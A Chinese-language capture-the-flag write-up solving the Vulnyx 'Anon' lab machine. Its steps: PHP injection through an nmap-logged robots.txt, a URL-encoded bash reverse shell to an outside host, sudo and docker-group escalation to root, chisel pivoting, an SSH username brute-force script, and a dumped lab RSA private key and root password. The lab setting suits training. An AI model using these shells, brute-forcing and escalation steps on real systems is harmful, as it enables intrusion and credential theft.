vulnyx-Anon

Vulnyx-Anon Writeup

这是一个中等难度的靶机。

它是一个Linux系统的机器。

端口发现

┌──(root㉿kali)-[/tmp]
└─# nmap -Pn -n -p- 192.168.56.104
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-24 02:06 EDT
Nmap scan report for 192.168.56.104
Host is up (0.00098s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:8F:E3:09 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

得到22,80端口的信息。

优先针对web服务进行信息收集。

web 80

目录扫描

┌──(root㉿kali)-[/tmp]
└─# feroxbuster -u http://192.168.56.104/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,bak
                                                                                                                                                                                             
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.104/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt, html, bak]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      368l      933w    10701c http://192.168.56.104/index.html
200      GET       25l      127w    10359c http://192.168.56.104/icons/openlogo-75.png
200      GET      368l      933w    10701c http://192.168.56.104/
301      GET        9l       28w      332c http://192.168.56.104/Anonymous-Connections => http://192.168.56.104/Anonymous-Connections/
200      GET      357l      810w    55475c http://192.168.56.104/Anonymous-Connections/anonymous.jpg
200      GET       98l      195w     2426c http://192.168.56.104/Anonymous-Connections/index.php
301      GET        9l       28w      340c http://192.168.56.104/Anonymous-Connections/victims => http://192.168.56.104/Anonymous-Connections/victims/
[##########>---------] - 11m  1672548/3308235 9m      found:7       errors:0      
[###################>] - 11m  1095480/1102725 1625/s  http://192.168.56.104/ 
[######>-------------] - 6m    350115/1102725 1029/s  http://192.168.56.104/Anonymous-Connections/ 
[####>---------------] - 4m    226540/1102725 892/s   http://192.168.56.104/Anonymous-Connections/victims/  

存在 http://192.168.56.104/Anonymous-Connections/

漏洞发现

需要我们输入一个IP？尝试一下本地回环地址。

回显为nmap，看这个输出是使用了对服务的版本信息进行探测。它会把扫描结果保存到ip.log日志文件中，通过目录扫描有另外一个目录victims 尝试到这个目录下访问这个log文件。

能够得到扫描结果。那么可以尝试在日志中写入php代码，然后通过访问日志文件执行php代码。那么寻找能够写入日志的方法。

当我们开启web服务后进行扫描会得到这样的请求记录。

robots.txt这是由于-sC详细扫描需要扫描网站的防爬虫规则

那么创建一个robots.txt，看看如何控制输出结果。

根据规则写入一些字符。

修改后开启web服务，去到页面中扫描我们的kali。

注意

假设这里你默认的是8000，端口是扫不到的，因为靶机的nmap只会扫描500端口。

所以这里我们设置端口在500以内。

会把robots.txt中的Disallow 的值输出。那么控制这个值进行rce

反弹shell

bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/192.168.56.101/1234%200%3E%261%27

很明显我们在docker里。

权限提升

目前我们还是普通用户，但是我们所在sudo组

hacktivist@debian1:/var/www/html/Anonymous-Connections/victims$ id
id
uid=1000(hacktivist) gid=1000(hacktivist) groups=1000(hacktivist),27(sudo)
hacktivist@debian1:/var/www/html/Anonymous-Connections/victims$ sudo -l
sudo -l
Matching Defaults entries for hacktivist on debian1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User hacktivist may run the following commands on debian1:
    (ALL : ALL) NOPASSWD: ALL

提权到root

history

root@debian1:/var/www/html/Anonymous-Connections/victims# history
history
    1  echo 'root:$uP3r_$3cUr3_D0ck3r' | chpasswd
    2  cd
    3  nano .bash_history 
    4  exit
    5  id
    6  ip a
    7  nmap -Pn -n -p- 172.17.0.2/24
    8  nmap -Pn -n -p- 10.10.10.10/24
    9  history

得到一个root的密码，但不是当前docker的，保存。$uP3r_$3cUr3_D0ck3r

扫描内网

root@debian1:/var/www/html/Anonymous-Connections/victims# nmap -Pn -n -p- 10.10.10.10/24
10.10/24 -n -p- 10.10.1
Starting Nmap 7.93 ( https://nmap.org ) at 2025-04-24 06:55 UTC
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.20, 16) => Operation not permitted
Offending packet: TCP 10.10.10.10:50197 > 10.10.10.20:7523 S ttl=51 id=3850 iplen=44  seq=3559377068 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.1, 16) => Operation not permitted
Offending packet: TCP 10.10.10.10:50197 > 10.10.10.1:2952 S ttl=46 id=18601 iplen=44  seq=3559377068 win=1024 <mss 1460>
Nmap scan report for 10.10.10.1
Host is up (0.000011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:42:D4:5D:80:BF (Unknown)

Nmap scan report for 10.10.10.20
Host is up (0.000017s latency).
Not shown: 65534 closed tcp ports (reset)
PORT     STATE SERVICE
2222/tcp open  EtherNetIP-1
MAC Address: 02:42:0A:0A:0A:14 (Unknown)

Nmap scan report for 10.10.10.10
Host is up (0.0000080s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 256 IP addresses (3 hosts up) scanned in 7.98 seconds

端口转发

在10.10.10.20中存在2222端口开放，我们需要端口转发。

上传chisel

kali : chisel server -p 12345 --reverse
baji : chisel client kali-ip kali-port R:port:127.0.0.1:port

成功转发端口

尝试ssh登录 （上面获得到一个root密码）

很明显我们还在docker里

root@debian2:~# ls -al
total 28
drwx------ 4 root root 4096 Feb  4 22:01 .
drwxr-xr-x 1 root root 4096 Feb  4 11:17 ..
-rw------- 1 root root   93 Feb  4 23:12 .bash_history
-rw-r--r-- 1 root root  586 Feb  4 20:29 .bashrc
drwxr-xr-x 3 root root 4096 Feb  4 20:21 .local
-rw-r--r-- 1 root root  161 Jul  9  2019 .profile
drwx------ 2 root root 4096 Feb  4 21:38 .ssh
root@debian2:~# cd .ssh
root@debian2:~/.ssh# ls
authorized_keys  id_rsa
root@debian2:~/.ssh# cat id_rsa 
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEAka2UWifZhkBCszlEWwhay91iCnRKXAlPkYRCrIYx2K8ElWv7
Cz6kzzLQhTdgCADpOZGJlsVnHeBUV2b5LoefoSSrcjgpM8g/55V+yUR/VOE46ZjW
yYwMCouvP4jmAQa40fmPCWBvKaMh0DQHBb5yrhS4rmEZdn7v6nyBaArQgCXFlYM9
NMirGtH6cKhKq9fgp2yEDfyvluq2DNZHcMwhPB9mFEOEjQsJ4DlRod0WeFJSVZSy
TCe/2sDRxYGEHsPyMJYs4ruAHInUJIYBCwsPredsEmNrxENjirpp8PjTIpC+kXBE
gLGIcjzunzT2M3L7HMCjGnJ4AV8nzykjkmD9jQIDAQABAoIBAHON3Zx5+ajtNjtW
FKuk/+iwLcGfJxDEbfI+mGijdcysX5Vq9tKfmTml1BOnriwLFPUORbZr1XS0ahJ+
YvAOsoevP7O1arFhiZdYVR6vj9UzZeKd0tpClZaT4KokHFX6EAa2z0gfz22Wsg6m
Bl//BpahZzEjYoBFBmfY5QkzctoCZQRhkTAhR520+oCFiosHGyiH6QCGYsO6WmwQ
7w7cm7rQ/MLNkgenRFUm0PRXrqti2K3kFUnU/Pfb9k4DoUtKSjpvA3kNbH9pIxlN
skbCJJfJeQpalBKwQyGqNkCzH9qMm31ZuLHsp6L73po2rWFIcoeraLhA/5No+S21
+v01t30CgYEA5mtTtslQmR2xhVr69z1lDdaFFaGsUWH5vlIGBvphAQsl2OwUbWk/
7rLy4yhddEYTfyc5xorkRsjmNjNyhMrtYks1ycvtEvCee7NuGHSO0Grzp3MKbAAY
t/gmGMckr9zdcsVVCIshm8PYo4feXClrHMe0MWLv97kcgGWvGLH+4UcCgYEAodnZ
dPL9J/O83kO5zybWlUL4RoIGLdP2axqNxoDju87qKNTKdsrKnmNV5NlQ+VH05eZ/
gQ5ninqFAR0hsvf4AHYmjySwY6S6mGnrXlhYkUE37crHVxdQruvtgUk4cTB0Lbk9
Vg0LoAnCJr96nJSWVcpER/p7/KD1LIcU/4oT9IsCgYEAlCT9NdBJWaiVsj/Ei6GV
j0gVWMsRl2F+yLbD2UixhZI9SzK+D3pT+IxlTVdufotvjZkStGwoSLpyCPca8fXm
mgPxGUVbr4m026OJbX/DMo0RCuAUG0wUmHObSuL+23MNjfUBrvSFLzjD2KBKfsbC
b0aWvAn4bzU89fBqm14VmZECgYEAn1T7+2J+j8cl5lUb5W9hjb1I9vhnptPk4VlZ
utIF30x6PkoFKt7GixhVZZ3+VgM1qOG6Ic2RZsTojMkl9K6iSaoGmaJPtzhirUqQ
d+dXAWAH9CNNDFKajikaPc1cMCm4JY8Xb9AV4q3YoRadWOn5+WjOwWE4j+HQms48
gLhonrMCgYEAthB9GOhxzeX5VEaw91tWhAdD+WNEO9TMN9fsyE9cISddgmBA5ozh
aTJl/gt09UodQhCNTmjYGByTkzGPH5c01HVhWfompn3GmK3jKwTbrUYh+P13Q1vn
A6j+O3UaX0P8w4seXeGyU2DA9iWCkwiKUUb4nj5IWt50Khmjv7BaXog=
-----END RSA PRIVATE KEY-----
root@debian2:~/.ssh# 

这个id_rsa我们不知道是哪个用户的。看起来有可能是真实机器用户的id_ras

爆破user

brute user

脚本，第一次写有点拉。不是完全体

brute_user(){

    if ( $# -lt 3 );then 
        echo -e "${BLUE}Usage:${NC} <user-dict> <target-ip> <id_rsa_path>"
        exit 1
    fi


    USERS_DICT=$1
    RHOST=$2
    ID_RSA_PATH=$3

    if [ ! -f "$USERS_DICT" ]; then 
        echo -e "${RED} $USERS_DICT does not exist! ${NC}"
        exit 1
    fi 

    if [ ! -f "$ID_RSA_PATH" ]; then 
        echo -e "${RED} $ID_RSA_PATH does not exist! ${NC}"
        exit 1
    fi 


    chmod 600 "$ID_RSA_PATH"

    for user in $(cat $USERS_DICT); do 
        timeout 0.5 ssh -i "$ID_RSA_PATH" "$user"@"$RHOST" -x id &>/dev/null
        if [ $? -eq 0 ];then
            echo -e "${GREEN}[+] User $user is valid ${NC}"
            exit
        else 
            echo -e "${RED}[-] User $user is invalid${NC}"
        fi
    done 
}

原理就是通过ssh连接，如果执行id成功则代表用户名正确。

ssh 登录真实机器

┌──(root㉿kali)-[/tmp]
└─# ssh alfredo@192.168.56.104 -i id_rsa
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
alfredo@anon:~$ id
uid=1000(alfredo) gid=1000(alfredo) groups=1000(alfredo),109(docker)
alfredo@anon:~$ 

存在docker组中，直接提权。

alfredo@anon:~$ docker run -v /:/mnt/ --rm -it debian chroot /mnt bash
root@4fa9df644703:/# id
uid=0(root) gid=0(root) groups=0(root)
root@4fa9df644703:/# cat /root/root.txt 
f3a421bdd1e5119f49c3fda29838cf79
root@4fa9df644703:/# cat /home/alfredo/user.txt 
af13f20ce2fb4266b4d381cf8f60f85f
root@4fa9df644703:/#